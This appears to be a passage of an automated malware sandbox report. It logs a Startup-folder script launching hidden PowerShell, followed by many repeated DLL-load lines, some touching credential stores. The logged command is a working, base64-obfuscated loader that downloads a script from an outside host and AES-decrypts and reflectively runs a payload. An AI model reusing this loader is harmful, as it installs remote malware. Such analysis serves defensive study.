aHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b50e3cba.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pstorec.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vaultcli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pstorec.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
